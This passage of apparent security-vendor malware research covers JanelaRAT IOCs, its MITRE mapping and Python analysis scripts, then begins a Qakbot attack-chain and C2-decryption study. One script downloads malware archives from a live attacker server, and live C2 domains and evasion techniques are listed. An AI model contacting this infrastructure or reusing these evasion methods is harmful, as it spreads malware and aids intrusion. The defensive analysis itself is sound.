ETCITIBANAMEXCOM|BANAMEX|BANORTEELBANCOFUERTEDEMXICO|BANORTEELBANCOFUERTEDEMX
ICO|BINANCECORRETORADECRIPTOMOEDASPARABITCOINETHEREUMEALTCOINS|COMPREEVENDABIT
COINRAPIDAMENTEPAXFUL|BITSOMSQUEUNEXCHANGEDECRIPTOUNASOLUCINCOMPLETA
In addition to the table above, you can infer locations from the first submission on VirusTotal for the VBScript. All the instances we were aware of at the time of analysis were first submitted from LATAM countries. Please see the table below for details:
Location of first submission for the VBScript
MD5 of the VBScript
Country of First Submission
8e7dc7fd611d286ff788ce5583f4d0f7
Mexico
cde203b715270f9d948704333630c0ee
Mexico
97704646c49406ab2bf5f80164bff55a
Mexico
be7d1742ac03106e5ae9a4d7b9320fd9
Mexico
e9d8743ccfb95b40210d056741c28dc6
Peru
7115d48c7a26ba5dbcbfdad6f2558f8b
Colombia
123eebaaa6db5a464fb6dc8bd165e15f
Colombia
7ac6d7857b77c27ebb4a1db9a176a86a
Colombia
Repurposing Remote Access Trojans (RATs): The usage of original or modified commodity Remote Access Trojans (RATs) is common among threat actors operating in the LATAM region. For example, Blind Eagle (aka APT-C-36) recently adopted this technique. You can read about it on TrendMicro or Check Point Research.
Abusing DNS services: Using dynamic DNS services to establish C2 channels from malware implants to the attacker's infrastructure is another technique adopted by Blind Eagle. You can read about it on BlackBerry's blog.
Conclusion
In conclusion, JanelaRAT's focus on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Zscaler Coverage
Zscaler sandbox coverage
The image below shows the Zscaler cloud sandbox report for JanelaRAT's VBScript downloader.
Figure 14: Zscaler sandbox coverage
In addition, Zscaler's multilayered cloud security platform detects this campaign at various levels with the following threat names:
VBScript.Downloader.JanelaRAT
Win32.RAT.JanelaRAT
Win64.RAT.JanelaRAT
MITRE ATT&CK Mapping
ID
Technique Name
Annotation
T1587.001
Develop Capabilities: Malware
The attacker repurposed a known malware (BX RAT) to generate a new malware (JanelaRAT) and added a new set of features.
T1608.001
Stage Capabilities: Upload Malware
The attacker staged compressed archives containing samples of JanelaRAT on the infrastructure.
T1059.005
Command and Scripting Interpreter: Visual Basic
The attack chain includes the execution of a VBScript responsible for installing JanelaRAT.
T1059
Command and Scripting Interpreter
The attack chain includes the execution of a batch script responsible for setting up persistence for JanelaRAT.
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence is achieved by setting a RunKey.
T1574.002
Hijack Execution Flow: DLL Side-Loading
JanelaRAT is side-loaded by a legitimate executable delivered by the threat attacker on the infected system. DLL side-loading is used for defense evasion.
T1027.002
Obfuscated Files or Information: Software Packing
JanelaRAT is protected with a commercial packer called Eazobfuscator.
T1140
Deobfuscate/Decode Files or Information
JanelaRAT strings are stored and encrypted with AES and encoded in Base64. Furthermore, strings in the VBScript are obfuscated.
T1497.003
Virtualization/Sandbox Evasion: Time Based Evasion
JanelaRAT goes idle if the last input event occurred more than 10 minutes before the check.
T1132.001
Data Encoding: Standard Encoding
JanelaRAT encodes information transmitted to the C2 in Base64.
T1573.001
Encrypted Channel: Symmetric Cryptography
JanelaRAT encrypts information transmitted to the C2 using AES.
T1095
Non-Application Layer Protocol
JanelaRAT establishes a socket-based C2 channel.
T1041
Exfiltration Over C2 Channel
JanelaRAT ships screenshots of the compromised system via the C2 channel.
Indicators of Compromise (IOCs)
MD5 hashes of Stage 1 compressed archives
526a0b2d142567d8078e24ab0758fad7
e841f4691e5107fe360b1528384a96f0
c39f75423862c1525f089a5e966b9d04
72c02b3181c763d0e67f060e91635a97
897e8483b673db70fdc5d3d111600cac
c2f4cb0da89b4ea86ab5369a942428eb
e56d8632db98b07d2b49423f7dd64b42
8b83e6b2d891cdf9250e9afd17081eab
999a9af2cd20a8c4bcf652e3523aafa3
MD5 hashes of VBScripts
51268b9681df47022c44af43f9d57255
24c6bff8ebfd532f91ebe06dc13637cb
1b72c12db8a37103a37cab5b3b14398c
397e407e63128e71089971e3b35dd253
172ca00d32a201f5e917bc4d73f720a1
505fab6d83ef86a4b12b5808047fa7f1
3870e4a4d86a34424ea47bdaa722cd89
44d9f29a81a2f2df83b6000165e8a06f
f71471d7e94ef739a8ee44125023b750
ec60bc4522fa58bfe9592abde33948a7
81618be603bca301ac156ed169444569
ba2bd2d31cf591480b69e106b0e77b5c
e2d7101f405ed88aba89bf39d56ee7a8
84919bf0583c0e6c04e606f34a1d56f3
48c189e5dfe28b9d2b32fd813a991adb
e684e872213432320c78f56c72c88a8e
c86fdacd8af28cb08ef406bc6d4fc5a7
d057c499f440b77cfcad8d859d389915
36a8a7407f084b4ae461b6bb4dd0b65c
900445a57f462d0df130c3612e6caed7
691cc21dae6e320564f74d6372e94286
b1e1134c82fdfe283948930089474574
0cf2707ce1dccd6054813cb9207bf3d4
d1684fa84602a2d560b47dfe0f0779b4
2cbee69042a4d85ecfe6e55639b1b42a
da48cd57e4b45cba63716bc2d53c4c76
Download URL for Stage 2 compressed archives
http://zimbawhite[.]is-certified[.]com:3001/clientes/[1-44]
http://45[.]42[.]160[.]55/
MD5 hashes of Stage 2 compressed archives
897e8483b673db70fdc5d3d111600cac
b2aaee6945f75caa1c44bca3e2812993
e166bd80341871c9d752537f80584334
3bbfc1f2e20ba8209d057c215303b2bf
4d62fc39e2586da78b65fff6dc844670
aa3162289e7e848b7aeb19c8b85131fd
1fc6298c88b3ea2030cc0382369d0bb9
999a9af2cd20a8c4bcf652e3523aafa3
42eb945b1b881b2319a74af06b1037db
8ca3dd771adbba82d28ce7ba4a0b8c97
e56d8632db98b07d2b49423f7dd64b42
e841f4691e5107fe360b1528384a96f0
4a1465999cdd9ee687b72289df05eaa9
5335caa5d199eac6f67b2e911b6b1e37
c39f75423862c1525f089a5e966b9d04
e2f9e1dfb24c9deb7f4a3c0c5c1fd016
3ec6342286d5b699bc1fb2ef6598f906
526a0b2d142567d8078e24ab0758fad7
3cbe59c309f803fffdadcc69d3578a53
4c9c287103defb55b9e89278800e4025
7548edc03021561c4d7a1b386aaa7696
596de51352cbeb0d26d861e991889578
18ed52de642d3f3aab7c271804bd005a
5a5106ee07d277b373d13c9f3160fea0
7b70c957449ab51f8d561582f229d5cf
0898c4c1cb698cd29707db44352ab868
5f628223fa083e4598badfe7efae5269
c2f4cb0da89b4ea86ab5369a942428eb
304202cbc70412e76a216257ff4d2085
398d0268535cba57fa3b33159bbe04f3
e6c501b52165cd278724ea229e44a8b9
c625443768b40cfbc93e28b92e874740
c5f2d6d3d3ac3521d2b2f7fa90d3ee5e
b036f1351ed5af87005978c7b6036d3d
3a336c5c7bd08587ad1709294d044e41
fc79aa5093f55dfa18a20f538c5e475e
4b142b23110fbb7b98ad49c051d7a1af
76887ccf6de5b5f8d70cd6d91450b131
6364aa555ae8fd0ba5a8d97a2ffa314a
72c02b3181c763d0e67f060e91635a97
8b83e6b2d891cdf9250e9afd17081eab
f4a42ef33e3a3a41b4e7ee0cd3173fb6
72f4e0f7ff7a82c1e5cb6480c0c90a00
1a47c3afa06960e8d8f54e507aa23675
JanelaRAT C2 domains
cnt-blackrock.geekgalaxy.com
aigodmoney009.access.ly
freelascdmx979.couchpotatofries.org
439mdxmex.damnserver.com
897midasgold.ddns.me
disrupmoney979.ditchyourip.com
kakarotomx.dnsfor.me
skigoldmex.dvrcam.info
i89bydzi.dynns.com
infintymexbrock.geekgalaxy.com
brockmex57.golffan.us
j1d3c3mex.homesecuritypc.com
myfunbmdablo99.hosthampster.com
irocketxmtm.hopto.me
hotdiamond777.loginto.me
imrpc7987bm.mmafan.biz
dmrpc77bm.myactivedirectory.com
jxjmrpc797bm.mydissent.net
askmrpc747bm.mymediapc.net
myinfintyme09.geekgalaxy.com
infintymex747.geekgalaxy.com
infintymexb.geekgalaxy.com
jinfintymexbr.geekgalaxy.com
minfintymexbr.geekgalaxy.com
cinfintymex.geekgalaxy.com
9mdxmex.damnserver.com
ikmidasgold.ddns.me
rexsrupmoney979.ditchyourip.com
kktkarotomx.dnsfor.me
megaskigoldmex.dvrcam.info
izt89bydzi.dynns.com
zeedinfintymexbrock.geekgalaxy.com
JanelaRAT C2 IP addresses
191.96.224.215
192.99.169.240
191.96.79.24
167.88.168.132
102.165.46.28
189.89.15.37
MD5 hashes of JanelaRAT DLLs
99bf0fba15aa3a9a59cbf442a80364e5
999a9af2cd20a8c4bcf652e3523aafa3
8b83e6b2d891cdf9250e9afd17081eab
e56d8632db98b07d2b49423f7dd64b42
c2f4cb0da89b4ea86ab5369a942428eb
897e8483b673db70fdc5d3d111600cac
72c02b3181c763d0e67f060e91635a97
c39f75423862c1525f089a5e966b9d04
e841f4691e5107fe360b1528384a96f0
526a0b2d142567d8078e24ab0758fad7
Appendix - Python Scripts to Help You Approach JanelaRAT
Script for decrypting JanelaRAT strings
import base64
import hashlib
import sys
from Crypto.Cipher import AES
def decrypt_string(cyphertext: str, key: bytes) -> str:
# handling the cyphertext
cypertext_bytes = bytes(cyphertext, "utf-16")
cypertext_decoded = base64.b64decode(cypertext_bytes)
iv = cypertext_decoded[:16]
# configuring the de-cryptor
decryptor = AES.new(key, AES.MODE_CBC, iv=iv)
# decrypting
plaintext_bytes = decryptor.decrypt(cypertext_decoded)[16:]
plaintext_decoded = plaintext_bytes.decode("utf-8")
# print(plaintext_decoded)
plaintext = "".join([c for c in plaintext_decoded if c.isalpha() or c.isnumeric() or c in (".", "|", "-", ":", "/", " ", "_", "{", "}", "?", "=", "@", "&", “#”)])
# plaintext = plaintext_decoded
return plaintext
def get_key(key: str) -> bytes:
key_bytes = bytes(key, "utf-8")
key_md5 = hashlib.md5(key_bytes)
return key_md5.digest()
def main() -> int:
args = sys.argv[1:]
if len(args) != 2:
print("usage: mx_strings_decryptor.py STRINGS_FILE KEY")
return -1
path, key = args
# handling key
key = get_key(key)
# decrypting strings
with open(path, "r") as sh:
for encrypted_string in sh:
# print(f">> {encrypted_string}")
if len(encrypted_string) <= 16:
print(encrypted_string.strip())
else:
try:
decrypted_string = decrypt_string(encrypted_string, key)
print(decrypted_string)
except:
print(encrypted_string.strip())
if __name__ == "__main__":
main()
Script to fetch all archives from the C2 server
import requests
import json
import base64
import time
def fetchemall():
for i in range(1,45,1):
url = "http://zimbawhite.is-certified.com:3001/clientes/" + str(i)
print("fetching archive number %d" %(i))
res = requests.get(url)
time.sleep(2)
response = res.text
j = json.loads(response)
enc = j['Body']
dec = base64.b64decode(enc)
o_fname = str(i) + ".zip"
with open(o_fname, "wb") as f:
f.write(dec)
return
if __name__ == "__main__":
fetchemall()
Thu, 10 Aug 2023 14:02:46 -0700Gaetano Pellegrinohttps://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintechHibernating Qakbot: A Comprehensive Study and In-depth Campaign Analysis
https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis
Introduction
In the ever-evolving landscape of cyber threats, banking trojans continue to pose a significant risk to organizations worldwide. Among them, Qakbot, also known as QBot or Pinkslipbot, stands out as a highly sophisticated and persistent malware active since 2007, targeting businesses across different countries. With a primary focus on stealing financial data and login credentials from web browsers, Qakbot also serves as a backdoor to inject next-stage payloads like Cobalt Strike and ransomware. Its adaptability, evasive techniques, and global reach have made it a formidable adversary for cybersecurity professionals seeking to defend against its malicious activities.
As part of our commitment to monitoring active malware campaigns, Zscaler's ThreatLabz team conducts in-depth investigations to uncover the various attack chains employed by Qakbot. In this research article, we delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods. We explore its use of diverse file formats, encryption techniques, and attack chains to evade detection and maintain its foothold in infected systems. Our examination also uncovers patterns in its Command and Control (C2) infrastructure and provides valuable insights into its geographic distribution.
Recent campaigns have revealed Qakbot's adaptation to changing conditions. In January 2023, after Microsoft disabled Macros by default in all Office applications, Qakbot began abusing OneNote files as a means of spreading itself. For detailed insights into these campaigns and obfuscation techniques, readers can refer to Zscaler ThreatLabz's research blog on OneNote.
With the use of Zscaler Sandbox, we shed light on the threat scores and specific MITRE ATT&CK techniques triggered by Qakbot during our investigation. Armed with this knowledge, cybersecurity professionals can better equip themselves to counter this persistent malware and protect their networks from its malicious campaigns.
Interestingly, we observed a significant decline in Qakbot activity after June, indicating a potential pause in the threat actor's operations. It appears that the group behind Qakbot has temporarily reduced its activities, which could indicate various factors at play.
Throughout this article, we delve into the intricacies of Qakbot's attack chains, encryption methods, and its wide geographical reach. Our ultimate goal is to empower cybersecurity professionals to better defend against this sophisticated and persistent banking trojan. By fostering collaboration within the cybersecurity community and staying vigilant in monitoring emerging threats, we aim to collectively enhance the security posture of organizations worldwide and preserve the trust of users and businesses alike.
Key Takeaways
1. Qakbot - A Persistent Banking Trojan: Qakbot, also known as QBot or Pinkslipbot, has been an active and persistent banking trojan since 2007. It continues to evolve over time, utilizing different techniques to infect users and compromise systems. Qakbot employs diverse attack chains, multiple file formats, and obfuscation methods to avoid detection from antivirus solutions and maintain its foothold in infected systems.
2. OneNote Campaign and Ongoing Activity: Following the OneNote campaign, Qakbot remains highly active, distributing its payload through various attack chains. Despite security measures and patches aimed at mitigating Qakbot's attacks, the threat actors continue to find novel ways to deliver their payload and exploit vulnerable Windows file formats. The malware employs different abusable file formats, including pdf, html, xhtml (eXtended HTML), wsf (Windows Script File), js (Javascript), ps (Powershell), xll (Excel add-in), hta (HTML Application), xmlhttp, etc., in its attack chain to infect users.
3. Global Reach and C2 Infrastructure: The analysis reveals Qakbot's wide geographic distribution, with C2 servers highly active in various countries. This highlights the malware's global reach and capability to target organizations worldwide.
4. Decline in Qakbot Activity: After observing a significant drop in Qakbot activity after June, it appears that the threat actor behind Qakbot has temporarily reduced its operations. The reasons for this decline remain unclear.
5. Collective Defense and Vigilance: Collaboration within the cybersecurity community, proactive monitoring, and adherence to best practices are crucial to effectively counter Qakbot's relentless pursuit. Strengthening security protocols and conducting security awareness training are essential in safeguarding against banking trojans like Qakbot and preserving the integrity of networks and sensitive data.
Analysis Of Qakbot Attack Chains
This section presents distinct variations of the Qakbot banking trojan attack chain, examined across samples discovered between March and May of 2023. The case studies below specifically concentrate on how diverse file formats and techniques execute the Qakbot end payload on the victim's machine, instead of directly dropping and executing the malware.
Case Study 1: March 2023 - Evolving Qakbot Tactics: Exploiting File Formats for Deceptive Payload Delivery
At the outset of the year, Qakbot began spreading through OneNote files. Subsequently, in March, a shift was observed, as Qakbot transitioned to using PDF and HTML files as the initial attacking vectors to download further stage files, leading to the delivery of the final payload. These file formats are commonly utilized by numerous threat actors to infect users.
Multiple attack chains were observed, wherein Qakbot utilizes PDF files as the initial vector to download the next stage file, which contains an obfuscated JS (Javascript) file bearing names like "Invoice," "Attach," "Report," or "Attachments" to deceive users into executing the file. Upon running the JS file, Qakbot initially creates a registry key and adds the base64 encoded Powershell command into the registry key using the reg.exe command line tool, enabling the download and execution of the Qakbot DLL.
Attack Chain: MalSpam -> PDF -> URL -> JS -> PS -> Qakbot Payload
Figure 1 - Illustrates the attack chain involving a Malicious PDF as the initial attack vector.
Qakbot recently reverted to utilizing HTML smuggling as a means of delivering its initial attack payload. This technique was observed across numerous campaigns during the previous year. In March, the identification of several new malspam emails indicated that threat actors were leveraging Latin-themed HTML files to facilitate the download of zip archives. These archives contained an obfuscated JS file, initiating a sequence similar to the one depicted in Fig.1, ultimately leading to the delivery of the Qakbot payload.
The attack chain discovered in March follows the following progression: Malspam -> HTML -> URL -> ZIP -> JS -> PS -> Qakbot Payload
In this chain, malspam serves as the initial delivery method, targeting unsuspecting victims through deceptive emails. The HTML files play a pivotal role in exploiting HTML smuggling techniques, concealing malicious activities within seemingly innocuous web content.
Upon accessing the HTML files, URLs are triggered, initiating the download of zip archives containing the obfuscated JS file. The use of obfuscation ensures that the malicious code remains hidden from casual detection and analysis, enhancing the threat actors' ability to evade detection.
Subsequently, the JS file is executed, setting off a series of actions that culminate in the execution of a Powershell command (PS). The Powershell command is instrumental in obtaining and executing the final payload, which, in this case, is the notorious Qakbot banking trojan. During our campaign follow up we found this sample from Twitter handle @Pr0xylife and @Cryptolaemus1.
This resurgence of HTML smuggling by Qakbot highlights the significance of continuous monitoring and awareness of evolving malware tactics and shifting attack chains for detecting and countering such threats.
Figure 2 - Shows the attack chain with a Malicious HTML file as the initial attack vector.
Later, a similar attack chain was identified, where the initial attack vector involved a PDF file. This PDF file was designed to download a zip archive, which, in turn, contained an obfuscated WSF/HTA file. Upon execution, the WSF/HTA file ran a base64 encoded Powershell command, leading to the download and execution of the final Qakbot payload.
The observed attack chain follows the following progression: Malspam -> PDF -> ZIP -> WSF/HTA -> PS -> Qakbot Payload
In this scenario, malspam continues to serve as the initial method of propagation, disseminating malicious content through email campaigns. The PDF file, acting as the attack vector, entices users to access its contents, ultimately triggering the download of a zip archive.
Inside the zip archive, an obfuscated WSF/HTA file is concealed, obscuring its malicious intent and complicating detection efforts. Once executed, the WSF/HTA file initiates a base64 encoded Powershell command, a common technique used by threat actors to download and execute further payloads without leaving a conspicuous trail.
The culmination of this attack chain results in the delivery and execution of the Qakbot banking trojan against the targeted system and its users.
Figure 3 - Features a Malicious PDF as the initial attack vector in the attack chain, accompanied by WSF and HTA files.
In another discovery made by ThreatLabz researchers, a variant of the Qakbot malware was observed employing a stealthy attack chain with the use of Microsoft Excel add-ins (XLL) as the initial vector. Microsoft Office add-ins are DLL files with distinct extensions based on the application they are designed for. While Microsoft Word add-ins use the '.wll' extension, Excel add-ins utilize the '.xll' extension.
The choice of using XLL files as the initial attacking vector is strategic for threat actors due to their ease of use. Unlike Word add-ins that must be placed in specific trusted locations depending on the Office version, XLL files are automatically loaded and opened by the Excel application, simplifying the delivery process for the attackers.
Moreover, XLL files possess unique characteristics that differentiate them from regular DLLs. They can have export functions that are invoked by the Excel Add-In manager when triggered by Excel. Upon launching an XLL file, Excel activates the export functions defined by the XLL interface, such as xlAutoOpen and xlAutoClose, similar to Auto_Open and Auto_Close in VBA macros. This mechanism is exploited by the attackers to load the malicious payload seamlessly, evading security measures and detection.
The attack chain follows a sequence where the threat actor utilizes a .xll file in the initial phase. When a user opens this .xll file, it proceeds to drop two files, "1.dat" and "2.dat," into the '\Users\User\AppData\Roaming\' directory. The "1.dat" file contains a 400-byte header of the PE file, while the "2.dat" file holds the remaining data of the PE file. These two files are then combined to create the "3.dat" file, which contains the actual Qakbot payload. Additionally, the attackers establish scheduled tasks to execute the Qakbot payload every 10 minutes, ensuring its persistence on the victim's machine.
The observed attack chain follows the following progression: Malspam -> ZIP -> XLL > Qakbot Payload
This attack chain sample underscores the ever-evolving nature of Qakbot, which continuously adapts its tactics and techniques to avoid detection and infiltrate systems. By utilizing XLL files and implementing sophisticated techniques to hide and deliver its payload, Qakbot continues to pose a significant threat to users and organizations.
Figure 4 - Shows the attack chain involving Malicious XLL files as the initial attack vector.
Case Study 2: April 2023 - Adapting Qakbot: Unraveling the XMLHTTP Experiment in the Attack Chain
In April, researchers noted more significant changes in the Qakbot attack chain, as the samples revealed the malware continued to experiment with different file formats to infect users.
In this evolved attack chain, the WSF (Windows Script File) contains a hex-encoded XMLHTTP request to download the Qakbot payload, replacing the previous base64 encoded PowerShell command.
The observed attack chain follows the following progression: Malspam -> PDF -> ZIP -> WSF -> XMLHTTP -> Qakbot Payload
Figure 5 - Depicts the attack chain utilizing the XMLHTTP file.
Towards the end of April, Qakbot's persistent use of OneNote files as the initial attack vector was still evident in its latest campaign. OneNote files served as an effective disguise, luring unsuspecting users into opening and executing the embedded contents. The attackers leveraged the familiarity and widespread use of OneNote files to increase the chances of successful infections.
Within this attack chain, the OneNote file contains an embedded MSI (Microsoft Installer) file. This MSI file was designed to trick users by posing as a legitimate Microsoft Azure installer, exploiting victims' trust in these familiar software installations and delivering the Qakbot payload.
The MSI file was purposely crafted to include several components, enhancing its evasive capabilities and making it difficult for security systems to detect its true intent. Among these components, a self-deletion PowerShell script was incorporated, allowing the malware to erase its tracks after execution, reducing the chances of detection and analysis.
Furthermore, the MSI file contained a configuration file that held essential information, including the path to execute a WSF (Windows Script File) script. This WSF script served as a critical link in the attack chain, acting as an intermediary to facilitate the download and execution of the Qakbot payload.
To ensure further obfuscation and evasion, the WSF script was hex-encoded, making it challenging for traditional security measures to interpret its true purpose. This encoded script was responsible for executing an XMLHTTP request, a technique used to download the actual Qakbot payload from a remote server.
Through this intricate sequence of deception and evasion, attackers aim to successfully deliver the Qakbot payload onto victim machines. By continuously adapting their attack techniques and leveraging familiar file formats, the threat actors behind Qakbot seek to stay one step ahead of security defenses and professionals.
The observed attack chain follows the following progression: Malspam -> OneNote -> MSI -> WSF -> XMLHTTP -> Qakbot Payload
Figure 6 - Evolving Attack Chain: Leveraging Malicious OneNote and MSI Files as Initial Attack Vector.
Case Study 3: May 2023: Qakbot Explores Advanced Defense Evasion Tactics
Throughout the month of May, researchers closely monitored Qakbot's activities and observed the threat actor's efforts to experiment with innovative Defense Evasion Tactics aimed at infecting users and evading detection. Alongside changes in the attack chain, Qakbot introduced sophisticated techniques, including Indirect Command Execution using conhost.exe and DLL Side-Loading, further complicating its detection and removal.
In this attack chain, Qakbot takes advantage of conhost.exe as a proxy binary to bypass defensive measures. By employing conhost.exe, Qakbot attempts to outwit security counter-measures that restrict the use of typical command-line interpreters. This enables the threat actor to execute commands using various Windows utilities, creating a clever diversion and making it more challenging for security tools to identify and mitigate the threat effectively.
The attack sequence starts with malspam, where malicious emails are distributed to unsuspecting victims. These emails often contain malicious attachments disguised as innocent files, luring users into opening them. The threat actors use PDF files packed within ZIP archives, which, when accessed, lead to the execution of WSF files via XMLHTTP.
To further obscure its activities, Qakbot then leverages conhost.exe, employing it as an intermediary to carry out specific commands. This tactic is part of Qakbot's strategy to operate stealthily within the compromised system, remaining undetected by conventional security mechanisms that may primarily focus on detecting direct malicious code execution.
The ultimate goal of this attack chain is to deliver the Qakbot payload, allowing the malware to infiltrate the victim's system, steal sensitive information, and potentially carry out other malicious activities, including espionage and financial theft.
The observed attack chain follows the following progression: Malspam -> PDF -> ZIP -> WSF -> XMLHTTP -> conhost.exe -> Qakbot Payload
Figure 7 - Demonstrates Qakbot's utilization of Indirect Command Execution with conhost.exe.
In this intricate attack chain, the initial vector is a ZIP file that conceals an executable (EXE) file. Upon execution, the EXE file loads a hidden dynamic-link library (DLL) that employs a curl command to download the final Qakbot payload. This attack chain also involves the use of DLL side loading technique, adding another layer of complexity to the attack.
The threat actor initiates this attack through malspam, sending deceptive emails containing URLs that lead to the delivery of the ZIP file. Once the user accesses the ZIP file and executes the embedded EXE file, the attack unfolds, triggering the loading of the concealed DLL. This DLL utilizes a curl command to download the final Qakbot payload from a remote server.
By incorporating DLL side loading, the threat actor creates a diversion, making it more challenging for security measures to detect the malicious activities. This advanced technique allows the malware to execute code indirectly and evade traditional detection mechanisms, adding an extra layer of sophistication to the attack.
The attack sequence follows: Malspam -> URL -> ZIP -> EXE -> DLL -> CURL -> Qakbot Payload
Figure 8 - Depicts Qakbot's utilization of DLL Side Loading in its attack chain.
On May 17th, several Pikabot samples were distributed using tactics, techniques, and procedures (TTPs) similar to those of Qakbot within the Zscaler Cloud. This discovery is valuable as it highlights a potential link or copycat scenario and provides insights into Pikabot malware behavior and distribution methods. The resemblance between Pikabot and Qakbot, including similarities in their behavior and internal campaign identifiers, suggests a possible connection between the two. However, there is not yet sufficient evidence to definitively link these malware families to the same threat actor.
Understanding the similarities and differences between Pikabot and Qakbot is critical for cybersecurity professionals to effectively respond to these threats. The identification of new malware variants helps security teams stay ahead of evolving attack trends, enabling them to adjust their defense strategies accordingly. By closely monitoring the behavior and distribution patterns of these malware families, security experts can enhance their threat intelligence and improve their ability to detect and mitigate such attacks in the future.
Threatlabz's ongoing technical analysis of Pikabot will provide further insights into its capabilities and potential impact on organizations. Keeping abreast of such developments and conducting thorough examinations of new malware variants is crucial for safeguarding networks, systems, and sensitive data from cyber threats. As the investigation progresses, security professionals can better assess the potential risks posed by Pikabot and formulate effective mitigation measures to protect against its infiltration and harmful activities.
Figure 9 - Shows the distribution of Pikabot, discovered in Zscaler Cloud.
Technical Analysis Summary
The analysis of various Qakbot campaigns revealed that despite different campaign strategies, all Qakbot samples retained a consistent core. Notably, the threat actor used different compilers in each campaign, resulting in changes to the binary's opcodes while maintaining the same depack algorithm. This technique aims to evade static detection mechanisms like YARA, making it more challenging for security analysts to identify and mitigate the malware.
Following execution, the Qakbot malware checks if it is running under the Windows Defender Sandbox environment using the GetFileAttributeW() function. Specifically, it searches for the presence of any directory named "C:\INTERNAL\__empty," and if detected, Qakbot terminates itself. This behavior showcases the malware's efforts to evade analysis within sandboxed environments and highlights its sophistication.
Figure 10 - Verification of Windows Defender Sandbox execution.
Additionally, the unpacking of the Qakbot malware is relatively straightforward, utilizing the VirtualAlloc() API to allocate memory space and execute itself. The unpacked payload reveals two different components within the Bitmap section: COMPONENT_07 and COMPONENT_08. COMPONENT_07 contains the encrypted campaign ID, while COMPONENT_08 contains the encrypted Qakbot command-and-control server (C2) configurations.
Qakbot samples tend to use the following resources:
Bitmap
RCData
Figure 11 - Component_07: Encrypted Campaign ID.
The screenshot in Figure 11 shows the encrypted content of Component_07, which appears to contain the campaign ID used by Qakbot. This encrypted data is a crucial part of the malware's internal campaign identification process, and decrypting it may provide valuable insights into the threat actor's campaigns and targeting strategies.
Figure 12 - Component_08: Encrypted QakBot C2 configuration.
The screenshot in Figure 12 shows the encrypted content of Component_08, which appears to hold the encrypted QakBot command-and-control (C2) server configuration information. Decrypting this component may reveal critical information about the communication channels and C2 infrastructure utilized by the QakBot malware and provide essential insights into the threat actor's operations.
Of note, Qakbot employs XOR encryption with two different offsets to encrypt significant strings. The encrypted data is strategically placed in the .DATA section of the unpacked payload binary file, enhancing its concealment and making it more challenging for analysts to interpret the content. The decryption loop relies on a separator byte as the termination condition, adding flexibility to the decryption process.
Figure 13 -Shows the encoded strings residing in the .DATA section of the Qakbot malware.
The use of encoding techniques in this section adds an extra layer of obfuscation. The decrypted strings contain critical information about Qakbot's anti-AV functionality and other malicious activities it performs. These decoded strings offer insights into the malware's behavior, showcasing the various techniques employed to avoid detection and hamper analysis efforts.
Figure 14 - Depicts the decrypted strings, along with the next stage decryption key.
These decrypted strings contain valuable information regarding Qakbot's functionalities and internal operations. The next stage decryption key is a critical component that leads to the unraveling of additional layers of encryption and provides insights into Qakbot's intricate behavior.
Figure 15 - Decrypted strings contain Anti-AV and Anti-Analysis strings.
The SHA-1 of the hardcoded key recovered from the .DATA section remains static across different campaigns, and it serves as the RC4 key to decrypt encoded data in the resource section. Additionally, the SHA-1 is used for validation purposes to ensure the accuracy of the decryption process.
Figure 16 - SHA-1 hash of encrypted key.
Moreover, Qakbot uses SHA-1 validation to decrypt the encoded configuration present in the resource section of the unpacked binary. The decrypted configuration contains critical information such as new RC4 keys and Qakbot campaign IDs.
Fig.17 - SHA-1 validation + New RC4 Key + Qakbot Campaign ID
The SHA-1 validation of the New RC4 key and the Encrypted Configuration matches with the first 20 bytes obtained from the decrypted data in the previous step (Figure 17).
Figure 18 - SHA-1 validation.
The first 20 bytes in the data represent the SHA-1 validation, a cryptographic process used for data integrity verification. These bytes serve as a hash value that allows systems to confirm the authenticity and integrity of the data being processed.
Following the SHA-1 validation, the subsequent 20 to 40 bytes are indicative of the new encryption key. Encryption keys are essential in securing data and ensuring that only desired parties can access and interpret the encrypted information.
Beyond the 40th position in the data, we encounter the encrypted configurations. These configurations likely contain critical instructions, settings, or data that the malware utilizes during its execution and malicious activities.
This data structure encompasses essential components of the Qakbot malware's operation, encompassing validation, encryption, and critical configurations necessary for executing its malicious objectives.
Figure 19 - Qakbot CampaignID.
Following the initial RC4 decryption process, the second round of RC4 decryption occurs on Component_08, as shown in Figure 12 of the resource section.
Component_08 is the encrypted section that likely contains the Qakbot command-and-control (C2) server configuration. Conducting the second RC4 decryption on this component may unveil critical information about the communication channels, domains, or IP addresses used by the malware to establish communication with its C2 infrastructure. Analyzing this decrypted data is essential in understanding the command and control infrastructure of Qakbot.
Figure 20 - SHA-1 hash validation, new RC4 key, Qakbot C2 configuration.
With the application of the new RC4 key, the decryption process enables access to the command-and-control (C2) configuration of the Qakbot malware. The decrypted configuration data is presented in hexadecimal format, with a starting separator value of "01". The subsequent four bytes are converted into decimal values byte by byte, followed by an additional two bytes that indicate the ports used to establish connections to the C2 servers.
Figure 21 - Qakbot's decrypted Command-and-Control (C2) configuration.
Upon decrypting the command-and-control (C2) configuration of Qakbot, a distinct pattern emerges in how the IP addresses and ports are separated. These values are initially represented in hexadecimal format, and Qakbot converts each byte of these values into their corresponding decimal equivalents to obtain the C2 addresses.
For example:
- IP: 58 7E 5E 04 (hex) -> 88.126.94.4 (decimal)
- Port: C3 50 (hex) -> 50000 (decimal)
By converting these values from hexadecimal to decimal, Qakbot obtains the IP addresses and ports, which are essential in establishing connections with its command-and-control servers.
Figure 22 - Qakbot's Command-and-Control (C2) configuration.
Overall, the technical analysis provides essential insights into Qakbot's behavior, evasion techniques, and the significance of analyzing its unique components to effectively counter and mitigate this persistent threat. Understanding the malware's strategies empowers security professionals to develop robust defense measures and stay proactive in safeguarding networks and systems from Qakbot and other evolving malware.
Network Analysis
Conducting a thorough examination of the Qakbot Command and Control (C2) infrastructure, we observed the top five countries where Qakbot C2s are most active. These countries include the United States (US), Great Britain (GB), India (IN), Canada (CA), and France (FR).
